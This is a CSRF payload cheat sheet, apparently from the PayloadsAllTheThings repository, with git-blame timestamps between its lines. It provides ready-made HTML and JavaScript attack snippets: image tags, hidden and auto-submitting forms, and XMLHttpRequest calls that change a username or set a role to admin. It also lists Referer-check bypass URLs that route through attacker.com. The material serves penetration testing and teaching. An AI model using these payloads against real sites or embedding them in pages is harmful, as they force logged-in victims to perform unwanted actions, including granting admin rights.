2018-12-24 13:14:51 +00:00
# Cross-Site Request Forgery
2019-01-28 19:27:45 +00:00
> Cross-Site Request Forgery (CSRF/XSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. - OWASP
2018-12-24 13:14:51 +00:00
## Summary
* [Methodology ](#methodology )
* [Payloads ](#payloads )
2019-12-17 16:51:53 +00:00
* [HTML GET - Requiring User Interaction ](#html-get---requiring-user-interaction )
* [HTML GET - No User Interaction) ](#html-get---no-user-interaction )
* [HTML POST - Requiring User Interaction ](#html-post---requiring-user-interaction )
* [HTML POST - AutoSubmit - No User Interaction ](#html-post---autosubmit---no-user-interaction )
* [JSON GET - Simple Request ](#json-get---simple-request )
* [JSON POST - Simple Request ](#json-post---simple-request )
* [JSON POST - Complex Request ](#json-post---complex-request )
2021-06-23 01:05:14 +00:00
* [Bypass referer header validation check ](#bypass-referer-header-validation )
* [Basic payload ](#basic-payload )
* [With question mark payload ](#with-question-mark-payload )
* [With semicolon payload ](#with-semicolon-payload )
* [With subdomain payload ](#with-subdomain-payload )
2019-12-17 16:51:53 +00:00
* [References ](#references )
2019-06-16 21:45:52 +00:00
## Tools
* [XSRFProbe - The Prime Cross Site Request Forgery Audit and Exploitation Toolkit. ](https://github.com/0xInfection/XSRFProbe )
2018-12-24 13:14:51 +00:00
## Methodology
2019-03-19 12:18:06 +00:00
![CSRF_cheatsheet ](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CSRF%20Injection/Images/CSRF-CheatSheet.png?raw=true )
2018-12-24 13:14:51 +00:00
## Payloads
2019-01-28 19:27:45 +00:00
When you are logged in to a certain site, you typically have a session. The identifier of that session is stored in a cookie in your browser, and is sent with every request to that site. Even if some other site triggers a request, the cookie is sent along with the request and the request is handled as if the logged in user performed it.
2019-06-16 21:45:52 +00:00
### HTML GET - Requiring User Interaction
2018-12-24 13:14:51 +00:00
```html
< a href = "http://www.example.com/api/setusername?username=CSRFd" > Click Me< / a >
```
2019-06-16 21:45:52 +00:00
### HTML GET - No User Interaction
2018-12-24 13:14:51 +00:00
```html
< img src = "http://www.example.com/api/setusername?username=CSRFd" >
```
2019-06-16 21:45:52 +00:00
### HTML POST - Requiring User Interaction
2018-12-24 13:14:51 +00:00
```html
< form action = "http://www.example.com/api/setusername" enctype = "text/plain" method = "POST" >
< input name = "username" type = "hidden" value = "CSRFd" / >
< input type = "submit" value = "Submit Request" / >
< / form >
```
2019-06-16 21:45:52 +00:00
### HTML POST - AutoSubmit - No User Interaction
2018-12-24 13:14:51 +00:00
```html
2019-02-07 22:33:47 +00:00
< form id = "autosubmit" action = "http://www.example.com/api/setusername" enctype = "text/plain" method = "POST" >
2018-12-24 13:14:51 +00:00
< input name = "username" type = "hidden" value = "CSRFd" / >
< input type = "submit" value = "Submit Request" / >
< / form >
< script >
document.getElementById("autosubmit").submit();
< / script >
```
2019-06-16 21:45:52 +00:00
### JSON GET - Simple Request
2018-12-24 13:14:51 +00:00
```html
< script >
var xhr = new XMLHttpRequest();
xhr.open("GET", "http://www.example.com/api/currentuser");
xhr.send();
< / script >
```
2019-06-16 21:45:52 +00:00
### JSON POST - Simple Request
2018-12-24 13:14:51 +00:00
```html
< script >
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://www.example.com/api/setrole");
//application/json is not allowed in a simple request. text/plain is the default
xhr.setRequestHeader("Content-Type", "text/plain");
//You will probably want to also try one or both of these
//xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
//xhr.setRequestHeader("Content-Type", "multipart/form-data");
xhr.send('{"role":admin}');
< / script >
```
2019-06-16 21:45:52 +00:00
### JSON POST - Complex Request
2018-12-24 13:14:51 +00:00
```html
< script >
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://www.example.com/api/setrole");
xhr.withCredentials = true;
xhr.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
xhr.send('{"role":admin}');
< / script >
```
2021-06-23 01:05:14 +00:00
## Bypass referer header validation
### Basic payload
```
1) Open https://attacker.com/csrf.html
2) Referer header is ..
Referer: https://attacker.com/csrf.html
```
### With question mark(`?`) payload
```
1) Open https://attacker.com/csrf.html?trusted.domain.com
2) Referer header is ..
Referer: https://attacker.com/csrf.html?trusted.domain.com
```
### With semicolon(`;`) payload
```
1) Open https://attacker.com/csrf.html;trusted.domain.com
2) Referer header is ..
Referer: https://attacker.com/csrf.html;trusted.domain.com
```
### With subdomain payload
```
1) Open https://trusted.domain.com.attacker.com/csrf.html
2) Referer headers is ..
Referer: https://trusted.domain.com.attacker.com/csrf.html
```
2018-12-24 13:14:51 +00:00
## References
- [Cross-Site Request Forgery Cheat Sheet - Alex Lauerman - April 3rd, 2016 ](https://trustfoundry.net/cross-site-request-forgery-cheat-sheet/ )
2018-12-25 15:10:15 +00:00
- [Cross-Site Request Forgery (CSRF) - OWASP ](https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF ))
2019-04-07 21:40:36 +00:00
- [Messenger.com CSRF that show you the steps when you check for CSRF - Jack Whitton ](https://whitton.io/articles/messenger-site-wide-csrf/ )
- [Paypal bug bounty: Updating the Paypal.me profile picture without consent (CSRF attack) - Florian Courtial ](https://hethical.io/paypal-bug-bounty-updating-the-paypal-me-profile-picture-without-consent-csrf-attack/ )
- [Hacking PayPal Accounts with one click (Patched) - Yasser Ali ](http://yasserali.com/hacking-paypal-accounts-with-one-click/ )
- [Add tweet to collection CSRF - vijay kumar ](https://hackerone.com/reports/100820 )
- [Facebookmarketingdevelopers.com: Proxies, CSRF Quandry and API Fun - phwd ](http://philippeharewood.com/facebookmarketingdevelopers-com-proxies-csrf-quandry-and-api-fun/ )
- [How i Hacked your Beats account ? Apple Bug Bounty - @aaditya_purani ](https://aadityapurani.com/2016/07/20/how-i-hacked-your-beats-account-apple-bug-bounty/ )
- [FORM POST JSON: JSON CSRF on POST Heartbeats API - Dr.Jones ](https://hackerone.com/reports/245346 )
2019-01-28 19:27:45 +00:00
- [Hacking Facebook accounts using CSRF in Oculus-Facebook integration ](https://www.josipfranjkovic.com/blog/hacking-facebook-oculus-integration-csrf )
2019-04-07 21:40:36 +00:00
- [Cross site request forgery (CSRF) - Sjoerd Langkemper - Jan 9, 2019 ](http://www.sjoerdlangkemper.nl/2019/01/09/csrf/ )
2019-06-16 21:45:52 +00:00
- [Cross-Site Request Forgery Attack - PwnFunction ](https://www.youtube.com/watch?v=eWEgUcHPle0 )
2021-06-23 01:05:14 +00:00
- [Wiping Out CSRF - Joe Rozner - Oct 17, 2017 ](https://medium.com/@jrozner/wiping-out-csrf-ded97ae7e83f )
- [Bypass referer check logic for CSRF ](https://www.hahwul.com/2019/10/11/bypass-referer-check-logic-for-csrf/ )